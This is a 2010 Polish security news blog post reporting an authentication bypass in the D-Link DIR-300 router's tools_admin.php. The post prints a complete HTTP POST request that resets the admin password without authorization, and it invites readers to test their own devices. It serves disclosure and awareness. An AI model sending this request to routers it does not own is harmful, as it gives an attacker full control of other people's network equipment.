09 listopada 2010
Jak przejąć kontrolę nad popularnymi routerami firmy D-Link?
wtorek, listopada 09, 2010 | Autor:
\m/ojtek
Firma D-Link ma już od dłuższego czasu spore problemy ze skutecznym implementowaniem mechanizmów bezpieczeństwa we własnych urządzeniach sieciowych. Na początku roku upublicznione zostały informacje na temat błędu w zabezpieczeniach protokołu HNAP, który pozwalał na ominięcie mechanizmów uwierzytelniania oraz autoryzacji i w efekcie łatwe przejęcie uprawnień administracyjnych w sporej grupie urządzeń tego popularnego producenta. Tymczasem pojawiły się informacje o równie interesującej luce obecnej w routerze D-Link DIR-300.
D-Link DIR-300 to bardzo popularny router bezprzewodowy, chętnie nabywany przede wszystkim ze względu na przystępną cenę oraz spore możliwości. Niestety, użytkownicy tego urządzenia są obecnie narażeni na utratę kontroli nad własnym routerem, bowiem bardzo prosty atak pozwala na zdobycie całkowitej kontroli nad DIR-300.
Problem tkwi w module tools_admin.php, który pozwala potencjalnemu intruzowi na dowolną zmianę kont oraz haseł administracyjnych i to bez jakiejkolwiek autoryzacji! Przykładowo wysłanie następującego żądania HTTP POST (przy założeniu, że adres IP routera to 192.168.1.1):
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0
ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
pozwala na ustawienie konta administracyjnego admin, zabezpieczonego hasłem uhOHahEh. Takie poświadczenia pozwalają oczywiście następnie na przejęcie całkowitej kontroli nad urządzeniem i wykonanie dowolnych działań administracyjnych w tradycyjny sposób.
Na powyższy rodzaj ataku mogą być narażone również inne modele korzystające z modułu tools_admin.php. Zachęcam więc do przetestowania własnych urządzeń D-Link i podzielenia się z nami wynikami poszczególnych doświadczeń. Warto podkreślić, że odkrywca tej luki (Karol Celiński), kontaktował się już w tej sprawie z firmą D-Link, jednak jak do tej pory nie otrzymał żadnej odpowiedzi...
[źródło]
[źródło]
Jak przejąć kontrolę nad popularnymi routerami firmy D-Link?
2010-11-09T19:28:00+01:00
\m/ojtek
Bezpieczeństwo sieci komputerowych|Newsy|Obrona - Atak|Sieci komputerowe|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7